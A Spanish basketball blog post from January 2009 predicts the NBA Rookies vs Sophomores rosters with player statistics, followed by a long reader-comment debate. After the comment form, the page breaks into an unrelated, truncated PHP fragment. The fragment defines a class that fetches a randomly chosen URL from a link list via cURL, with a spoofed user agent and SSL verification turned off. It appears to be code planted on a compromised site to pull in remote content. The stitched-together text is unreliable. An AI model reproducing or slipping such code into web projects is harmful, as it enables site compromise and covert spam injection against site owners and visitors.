Rookies VS Sophomores 2009

26 de January de 2009 por Viva_Dirk

Al igual que hicimos con el All-Star, vamos a daros nuestra opinión sobre quienes son nuestros elegidos para ir al partido de rookies contra sophomores. Los datos estadísticos son de ayer, 25 de Enero de 2009.

ROOKIES

Derrick Rose: Será sin duda el base titular. Su equipo es de lo mas irregular , pero él, siendo rookie, no lo es tanto. 43 partidos jugados, 16.8 puntos y 6.3 asistencias por noche con un 46% en tiros. Tiene sus lunares en los tiros de 3 y en algo que no se ve en la estadística, la defensa del bloqueo directo.

OJ Mayo: El máximo anotador entre los novatos. 19 puntos, 4 rebotes y 3 asistencias con un 44% en tiros de campo, 88% en tiros libres y 37% más allá de la línea de 3 desde donde ha bajado su acierto en los últimos partidos.

Eric Gordon: Se ha convertido en el lider de los Clippers ante la ausencia de los pesos pesados. 13 puntos por partido en sus 41 partidos jugados, pero cuidado con él porque en los 11 partidos jugados en 2009 sus cifras aumentan hasta los 22.5 puntos. Es dificil que le veamos hacer mas cosas que anotar, pero también ha subido su número de asistencias.

Michael Beasley: Alterna partidos de dobles-dobles con otros en los que juega 10 minutos pero si Marion sale del equipo sus números pueden subir definitivamente como la espuma. A dia de hoy nos deja 13.6 puntos y 5.3 rebotes. En su contra vemos que sumando las asistencias, los robos y los tapones que hace por partido no supera el número de pérdidas.

Brook Lopez: No sabemos como acabará la temporada Oden, pero a día de hoy López es el mejor center debutante en dura pugna con Marc Gasol. Sus números son de 11.3 puntos, 8 rebotes y 2 tapones, y en tiros libres supera el 80%.  Es otro al que no hay que quitar ojo porque en 2009 promedia 14.4 puntos.

Russell Westbrook: No ha conseguido estar en el concurso de mates pero es seguro que lo veremos en este partido. Entre los novatos es el tercer anotador, segundo asistente, octavo reboteador (primero entre los exteriores) y segundo en robos. Su 14-4-5 se presenta como un complemento perfecto para Kevin Durant.

Kevin Love: Otro que ha tardado en rendir pero sus números en el 2009 son de doble-doble. Es una de las claves de la gran racha de los Wolves, máximo reboteador entre los novatos y sexto en toda la liga en rebotes ofensivos.

Marc Gasol: La referencia interior de Memphis promedia 11.3 puntos, 7.2 rebotes y 1 tapón por partido. El mejor en porcentajes de campo entre los rookies protagonizando muy buenas actuaciones tanto ofensivas como defensivas contra alguno de los mejores jugadores de la liga.

Rudy Fernandez: Seguramente su presencia en el concurso de mates le quita posibilidades de ir a este partido pero para mi su temporada es mejor que la de Chalmers, Agustine u Oden. De momento se ha etiqutetado como tirador, lo que no nos gusta mucho, y promedia 11 puntos por partido.

SOPHOMORES

Rodney Stuckey: La marcha de Billups le ha otorgado el status de titular en los Pistons y es la mejor noticia de la temporada en Detroit. En los 39 partidos que ha jugado promedia 14 puntos y 5 asistencias con un 47% en tiros, pero desde que se fue Billups sus números son aún mejores. Concretamente, en 2009 ,18.3 puntos de media.

Kevin Durant: Está en muchas quinielas para ir al partido de los mayores y no es para menos. Sus números, de no ser por los ‘animales’ que campean por la liga son cercanos a los de un MVP: 24.2 puntos, 6.5 rebotes, 47% en tiros de campo, 42% en triples y 86% en libres.

Al Thornton: No sabemos si la baja de Baron Davis le viene bien o mal, pero de todos modos su temporada esta siendo buena. 17 puntos, 5 rebotes y un tapón por noche. Con él y Gordon los Clippers han encontrado algo por lo que sonreir.

Jeff Green: A la sombra de Durant este forward está haciendo unos números más que interesantes y mostrando una capacidad defensiva de las que hacen falta para que un equipo suba de nivel. Sus 16.4 puntos y 6.4 rebotes son números de alero, pero algunos lo ven mas cómodo como ala-pívot.

Luis Scola: El argentino es el más constante de los Rockets con las típicas lesiones de McGrady y el cuidado con el que hay que tratar a Yao. Es titular pero no alcanza los 30 minutos por partido,.En ese tiempo deja 11.6 puntos y 7.8 rebotes con más de 50% en tiros y sin perder apenas balones.

Wilson Chandler: Uno de los candidatos a jugador más mejorado.  No cabe duda de que con D’Antoni es un power forward que en 33 minutos de juego rellena todo el cuadro estadístico: 14 puntos, 5 rebotes, 2 asistencias, 1 robo y un tapón.

Thaddeus Young: Otro caso de indefinición entre la posicion de alero y ala-pivot. En ausencia de Brand ha jugado de cuatro promediando en 2009 14 puntos y 5.5 rebotes. En cambio sus medias anuales son de 12.8 puntos y 4.7 rebotes. Cuando los Sixers corren él es protagonista.

Spencer Hawes: Tuvo un inicio de temporada deslumbrante pero ha ido de más a menos. Aun así es uno de los centers mas prometedores de la liga, que segun está el panorama es decir mucho. Promedia 10.4 puntos, 6.5 rebotes y 1.4 tapones en 27 minutos, pero en esos números no se ven sus movimientos en el poste bajo, su tiro de media distancia y su visión de juego. A mi me mola.

Nick Young: La baja de Arenas y su descaro le meten entre nuestros candidatos. En 22 minutos de juego alcanza los 10.6 puntos. Cuando sale al campo hace poco mas que mirar el aro pero sus porcentajes son buenos y sus pérdidas pocas que suelen ser, normalmente, los defectos de este tipo de jugones.

Comenta

32 comentarios a esta entrada

  1. Jabho dice:
    #1

    Firmo tus candidatos aunque me cuesta pensar que no vaya Oden. No sé, creo que o Marc o Rudy, o los dos, se quedan fuera….

    Que poquito exterior de calidad entre los sophmores ¿¿Sessions???¿¿Brooks??? Si se recupera debería ir Horford también.

      Citar

  2. Viva_Dirk dice:
    #2

    Evidentemente Horford deberia ir, pero doy por hecho que Atlanta hará todo lo posible para que no vaya.

      Citar

  3. Hynreck dice:
    #3

    O Rudy o Marc, los dos no van ni de coña, y no os engañeis, Oden va fijo, hay 8 plazas adjudicadas: Rose, Mayo, Beasley, Love, Lopez, Oden, Westbrook y Gordon y la novena a repartir entre Rudy, Marc, Thompson, Mba a Moute, Augustine…
    Creo que será Marc, ya que Rudy aparte de bajar mucho va a los mates, pero aun asi me extraña q vayan 4 pivots… no se igual hay sorpresita y no va ninguno de los dos..

      Citar

  4. Txusma dice:
    #4

    Es un poco como lo de Shaq en el All-Stars: Oden va fijo aunque por ejemplo Thompson y Marc hayan hecho mejor temporada que él. Tb es cierto q Thompson y Marc están en uno de los peores equipos de la NBA y quieras que no eso tb debe contar.
    Entre los Sophomores no se yo si Horford dejará de ir a poco que pueda. Hace unos años recuerdo q Ilgauskas fue convocado al All-Stars y estaba tocado de manera que fue pero jugó muy pocos minutos. ¿Es posible o me falla la memoria?

      Citar

  5. MagicJohnson32 dice:
    #5

    La NBA presiona muchísimo para que los jugadores vayan al All-Star incluso estando renqueantes. Está el caso de Kobe el año pasado o el de Ilgauskas que comenta Txus. Kobe jugó 3 minutos, o algo así. Y en cierta manera es normal la actitud de la NBA porque de lo contrario empezaría a generalizarse lo de ausentarse al All-Star por pequeñas lesiones y el evento perdería el prestigio que le queda.

    Por cierto, a mí me parecería injusto que fuese Oden. Aunque sí, supongo que lo llevarán.

      Citar

  6. kantonyo dice:
    #6

    Yo llevaria a Odon seguro. Es él que tiene más potencial de todos. Y para nada estoy de acuerdo que Marc o Thompson esten haciendo mejor campaña. Al reves por sus actuaciones pienso, que el que mejor lo está haciendo sin duda es Greg Oden y más aún teniendo en cuenta que está en una franquicia ganadora.

    Lo único es que lo vemos con distintos ojos ya que esperamos mucho de él y que además solo dispone de 23 minutos por partido. Tengo clarisimo que si Oden estuviera en Memphis o Sacramento estaria rondando los 20 puntos y 15 rebotes por partido.

    Mi apuesta:
    PG – Rose / Westbrook
    SG – Mayo / Gordon
    SF – Mbah-a-Moute
    PF – Beasley / Love
    C – Lopez / Odon

    y si se deciden en llevar más de 2 center, Gasol por Mbah a Moute.

      Citar

  7. kantonyo dice:
    #7

    En los Sophomores coincido con Viva excepto en Landry por Nick Young. Valoro tb la buena temporada del de Houston a pesar de sus pocos minutos en pista. Aunque claro si está Horford, el puesto sería para el dominicano.

      Citar

  8. MagicJohnson32 dice:
    #8

    Kantonyo… Oden no tiene competencia en el puesto de C en los Blazers (Przyzbilla, ya ves) y no juega más porque el tío es incapaz de mantenerse sin problemas de faltas. Hace una cada 6 minutos de juego, y diría que ha tenido 4 ó 5 partidos este año en el que ha sido eliminado por 6 faltas en menos de 25 minutos.

    Está jugando mejor últimamente pero vaya, que tengo claro que Marc está haciendo mejor año.

      Citar

  9. Kantonyo dice:
    #9

    Estoy de acuerdo contigo que Oden no tiene todavia la experiencia necesaria, y peca haciendo faltas, pero estamos hablando de Rookies, y más teniendo en cuenta que Greg solo dispustó un año de NCAA, es lógico como pivot tan novato que no sepa contenerse en defensa.

    Pero creo que es más competencia tener como compañeros a Pryzbillla, Aldridge y Frye que Warrick, Milicic y Arthur.

    Y por no hablar de lo que supone Oden en USA, yo vería muy sorprendente que no fuera al All-Stars en cambio no me estrañaría lo más mínimo que Marc no fuera, no pq no esté entre los 9 mejores rookies, sino pq ha tenido la mala suerte de coincidir con la mejor cosecha de pivot de los últimos años:

    Oden, Lopez, Love, Gasol, Hibbert, Hickson, Jordan, Koufos, McGee ….

      Citar

  10. Noelinho dice:
    #10

    El caso de Hibbert aún es más exagerado que el de Oden. Si este hace 1 cada 6, Hibbert debe de hacer 1 cada dos minutos, es que es de escándalo. Y es una lástima, porque en los pocos partidos que se ha mantenido mucho rato en pista ha jugado realmente bien.

      Citar

  11. Txusma dice:
    #11

    Como dicen en otro comentario ya hay equipos para el rookies vs Sophomores:
    Marc y Rudy, como el resto de los participantes, han sido elegidos para disputar el partido por todos los entrenadores asistentes de la NBA.

    ” El equipo de los rookies será el formado por Michael Beasley (Heat), Rudy Fernandez (Trail Blazers), Marc Gasol (Grizzlies), Eric Gordon (Clippers), Lopez (Nets), O.J. Mayo (Grizzlies), Greg Oden (Trail Blazers), Derrick Rose (Bulls) y Russell Westbrook (Thunder).

    Por los jugadores de segundo año estarán: Aaron Brooks (Rockets), Wilson Chandler (Knicks), Kevin Durant (Thunder), Jeff Green (Thunder), Al Horford (Hawks), Luis Scola (Rockets), Al Thornton (Clippers), Rodney Stuckey (Pistons) y Thaddeus Young (Sixers).”

    En los rookies han entrado los q pronosticaba Viva con el cambio de Oden por Love, no se si un tanto injusto pero bueno. En los sophomores tb casi clavado con Brooks x Young y Horford x Hawes.

      Citar

  12. Fran Reyes dice:
    #12

    Ya han salido los equipos de rookies y sophomores…

    Rookies: Michael Beasley (Heat), Rudy Fernandez (Trail Blazers), Marc Gasol (Grizzlies), Eric Gordon (Clippers), Lopez (Nets), O.J. Mayo (Grizzlies), Greg Oden (Trail Blazers), Derrick Rose (Bulls) y Russell Westbrook (Thunder)

    Sophomore: Aaron Brooks (Rockets), Wilson Chandler (Knicks), Kevin Durant (Thunder), Jeff Green (Thunder), Al Horford (Hawks), Luis Scola (Rockets), Al Thornton (Clippers), Rodney Stuckey (Pistons) y Thaddeus Young (Sixers)

    ¿Novedades respecto al post? En los sophomores, Hawes y Nick Young dejan su sitio a Horford y Brooks. (¿Brooks?). En los rookies, el único cambio es el de Kevin Love por el polémico en este post Greg Oden.

    De cualquier manera, gran noticia el tener a nuestros dos rookies en el partido 🙂

      Citar

  13. Txusma dice:
    #13

    jajajaja… Mismo post con 2 minutos de diferencia…
    Lo de Horford x Hawes es bastante logico aunq el pivot de sacramento creo q esta haciendo mejor temporada q Brooks o Nick Young. Lo de Love x Oden, malo, malo.

      Citar

  14. kantonyo dice:
    #14

    Seamos sinceros, lo que es injusto es que vaya Rudy, y eso que soy un seguidor suyo y de los Blazers, me compre su camiseta nada mas saber que iba a jugar alli. Pero no creo que por su juego se lo merezca. Sobre todo en el último mes…. Parece que tiene gran cache en USA, y que tiene buena imagen, pero es el más flojo de todos en estadísticas de largo, y su juego ha sido muy plano. Ves un partido de él y ves todos. Aunque ha aparecido bastantes veces en el top10.

    Posiblemente haya sido elegido pq puede ofrecer mucho más espectaculo que cualquiera en el allstar.

    Creo que tanto Love, Lopez, Oden y Marc se lo merecen más, pero son 4 pivots y como mínimo uno se tenia que quedar fuera.

      Citar

  15. TheDeerHunter dice:
    #15

    ¿qué rookie se lo merecía más que él de los que se han quedado fuera?? ¿Love?? ¿Chalmers?? ¿Thompson?? ¿Augustine??
    Yo creo que su inclusión se la jugaba únicamente con Chalmers… y para nada tiene peores números que él jugando 5 minutos menos por partido (y qué minutos, por cierto)
    Thompson y Love se la jugaban con los otros 3 que has mencionado… y para mí el que más se lo podía merecer era Thompson, bastante más que Oden… por cierto.

    El caso de Love… todo lo que has dicho sobre el Rudy de las últimas semanas se lo podías aplicar al Love del principio de temporada. Por otro lado… por talento Rudy creo que no tiene rival en ninguno de los mencionados y creo que eso también se premia en el All-Star.

    En cualquier caso, creo que mi elección probablemente hubiera sido la que han hecho, cambiando a Thompson por Oden.

      Citar

  16. kantonyo dice:
    #16

    Está claro que a Rudy lo han llevado por el espectaculo, no por que haya hecho más meritos que otros. Han elegido una plantilla muy descompensada. 5 guards, 1 Forward y 3 Centers.

    Y espero que alguien me diga con datos, pq Oden no se merece ir, no simplemente diciendo que no. Antes en un mensaje que no aparece he dado datos:

    Ultimos 5 partidos : 30 min – 16.4 pts – 66 % – 11.4 reb – 1.6 st – 1,4 bl – 23.0 Eff/p – 27.5 36Eff
    nominado a mejor jugador del oeste la semana pasada.

      Citar

  17. Viva_Dirk dice:
    #17

    Lo primero, poner los números de los 5 últimos partidos es muy ventajista, pero mira, los números de Kevin Love los 5 últimos partidos son: 25.6 min – 14.2 pts – 62% – 9.2 reb – 1.4 asis – 82% tiros libres. Extrapolandolo a los 30 minutos de Oden le supera en puntos y rebotes.

    Pero pides datos por los que Oden no merezca ir, sabiendo que sus números son 9 puntos, 7.4 rebotes, 55% en tiros de campo, 64% en libres y un tapón, alla van:

    – Kevin Love: 9 puntos, 8.4 rebotes, 44% en tiros de campo y 75% en tiros libres.

    – Jason Thompson: 10.1 puntos, 6.7 rebotes, 49.5% en tiros de campo y 71% en libres. Y en su equipo no da una asistencia ni cristo.

    – Mario Chalmers: 9.5 puntos, 4.6 asistencias y 1.8 robos, los porcentajes siendo un hombre exterior no son comparables.

    . DJ Augustin: 12 puntos y 4 asistencias.

    Esos datos y 2 centers con números claramente mejores deberian haber decantado la balanza por algun forward como Thompson o Love.

      Citar

  18. Viva_Dirk dice:
    #18

    Deer dice que Rudy no tiene rival en lo que a talento se refiere con los que se han quedado fuera, cuidadín con confundir talento con conocimiento del juego, porque Love tiene muchísimo talento, y Augustin tampoco se queda corto.

      Citar

  19. TheDeerHunter dice:
    #19

    Pues la comparación de números en sí directamente la pierde tanto contra Marc, como contra Love e incluso contra Thompson.
    Únicamente la ganaría contra Marc suponiendo una mejora de minutos y una regla de tres directa, como tú defendías. No me parece justa esa teoría porque por ahí deberían valorarse algunas variantes más además de esa.

    Tampoco me parece justo el razonamiento circunstancial de la racha de buenos partidos que ha hecho Oden. Marc ha hecho partidos verdaderamente memorables y ha tenido rachas bestiales. Tanto así que ha estado entre los 5 primeros de varios ilustres ranking de rookies prácticamente toda la temporada… y no precísamente porque le haya beneficiado el nombre ni la posición en el draft.

    Love tiene razón de quejarse… porque en su caso es todavía más sangrante ya que no hay hipótesis que lo salve. Ha dicho más o menos que se trata de una decisión política. Dudo mucho que se refiriera a Marc en ese sentido.

      Citar

  20. TheDeerHunter dice:
    #20

    Por lo que dices de conocimiento de juego no lo dudo en absoluto, Viva… aunque en ese sentido Rudy tampoco desmerece contra casi nadie.

    En fin, no lo sé… reconozco que no lo tendría tan claro entre Thompson o Love. No los he visto jugar todavía… a Oden, Marc y Chalmers sí. Y entre otras cosas por esa precisa razón y por lo del conocimiento del juego ahora mismo descartaría a Oden por decreto ley (aunque espero cambiar en algún momento la opinión que tengo de él)

      Citar

  21. kantonyo dice:
    #21

    Thompson y Marc juegan en las dos peores franquicias de la liga. Sus números muchas veces han sido agrandados en minutos de la basura, y aún así no mejoran las de Oden. Es muy importante jugar en un gran equipo, que haga estadisticas, pero que esas stats, sean decisivas en las victorias.

    Si Marc, Thompson juegan a su mejor nivel que han demostrado en esta temporada, no cambia nada en la Nba, pero como Oden mantenga este nivel …….

    Dentro de 10 años no habrá dudas en que Oden tenía que haber estado en este allstar. Si no hubiera ido, hubiera sido un gran cagada.

      Citar

  22. Viva_Dirk dice:
    #22

    Que tiene que ver dentro de 10 años? A dia de hoy por números otros lo merecen mas que el, que vaya a ser mejor jugador que ellos no quiere decir que tenga que ir aunque lo merezca menos.

      Citar

  23. TheDeerHunter dice:
    #23

    No creo que Love se sienta mejor pensando en la cagada que hubiera supuesto no llevar a Oden.

    Si yo fuera él me sentiría bastante injustamente tratado.

    Por otro lado… si algún día Kevin Love logra ser una especie de McHale o algo así… ese día habría que capar a más de uno.

      Citar

  24. Kantonyo dice:
    #24

    Yo es que no estoy diciendo que sea Love el que tenía que haberse quedado sin ir.

    Creo que Rudy por meritos, y por que en su puesto ya hay demasiados, es el que tenia que haberse quedado fuera, y entonces hablariamos de 2PG+2SG+1SF+1PF+3C, algo más compensado.

    Oden en cambio 9 partidos con mas de 20 y 1 partido con más de 30.
    Love 10 partidos con mas de 20 y 1 con más de 30.
    Marc 9 partidos con más de 20 y 1 partidos con mas de 30.

      Citar

  25. Kantonyo dice:
    #25

    perdón he dado al enter sin querer…

    Rudy en cambio solo ha conseguido 3 partidos por encima de 20 de eff.

    En fin, creo que no llegamos a un acuerdo, por lo tanto el tiempo nos dara y quitara la razon.

      Citar

  26. Jabho dice:
    #26

    KAntonio ¿porque no le aplicas a Rudy el mismo razonamiento que a Oden? Los números de Rudy en Porland, con Roy monopolizando el juego exterior no son nada malos. Mas allá de números defiende bien y ahora mismo es mejor jugador que muchos… Acaba jugando los partidos igualados de los Blazers.

    Yo tenía mas o menos claro que Oden iba a ir. Quitar a Love es injusto como lo es quitar a otros como thompson o Augustine….

      Citar

  27. isi dice:
    #27

    ola a mi lo q me da cierto coraje esq un jugadorazo como bealsey en 25 minutos aga 13.3 puntos y 5.5 rebotes y otro como oj mayo aga 19 puntos en casi 40 minutos. si beasley jugase lo mismo q mayo estoy seguro d q seria un 20-10 o le faltaria mu poco . no entiendo porqe spoelkstra confia tan poco en beasley . un saludo

      Citar

  28. MagicJohnson32 dice:
    #28

    Puede que Beasley sea muy bueno, se le ven mimbres, pero de momento me demuestra muy poca inteligencia y entiendo perfectamente a Spoelkstra.

      Citar

  29. kantonyo dice:
    #29

    Hola Isi, yo creo que la respuesta puede ser pq Miami Heat se está jugando un puesto en los playoffs desde el principio y basa su juego en su jugador referencia, Wade.
    En cambio en Memphis han tirado practicamente la temporada y su objetivo es que OJ Mayo pueda jugar cuanto más minutos mejor, y tener la mayor ‘responsabilidad’ en el juego. Para así que pueda coger lo antes posible la experiencia necesaria y poder llegar a ser su jugador franquicia en los proximos años.
    No me parece mal que Erik Spoelstra dosifique a Beasley. Tuvo un comienzo un poco defraudante teniendo en cuenta que fue elegido como número 2 del draft. y creo que debido a que Eric ha sabido darle los minutos necesarios para que esté creciendo día a día.

      Citar

  30. Viva_Dirk dice:
    #30

    Isi, la respuesta a eso es que Beasley se lo ha buscado, empezó la temporada jugando mucho, mas concretamente en sus 10 primeros partidos sus números fueron:

    33.4 minutos-15.3 puntos-5.9 rebotes-1.6 asistencias-0.8 robos-0.6 tapones-2 pérdidas-44% en tiros-30% en triples

    El equipo perdió partidos contra Knicks, Bobcats o Raptors, por falta de rebote y de defensa interior. Beasley ha demostrado que no es capaz de ser un secundario que es lo que tiene que ser estando Wade en pista, no doble un balón y a dia de hoy como digo en el artículo pierde mas balones que sumando asistencias, robos y tapones.

    Mayo pudiendo tirarse hasta las zapatillas respetó desde el principio es estatus de Gay, incluso siendo mas jugador que el.

      Citar

  31. isi dice:
    #31

    si pero a tenido partidos con 30 minutos d dobles-dobles pero tambien os entiendo por otro lado porqe el otro dia vi el magic-heat y beasley sienpre llegaba el ultimo a defender pero creo q si marion se va finalmente beasley va a explotar como juagdor

      Citar

  32. isi dice:
    #32

    aaaa y otra cosa yo pienso q deberia d ir mario chalmers q es el ginobili d este draft entro d tapado y esta demostrando su calidad como er dia por ejemplo d los 9 robos ante philadelphia si no recuerdo mal o algunos partidos con bastantes triples y pienso q deberia d entrar por rudy porqe rudy ya esta en el concurso d mates y va a participar en el all star chalmers no

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>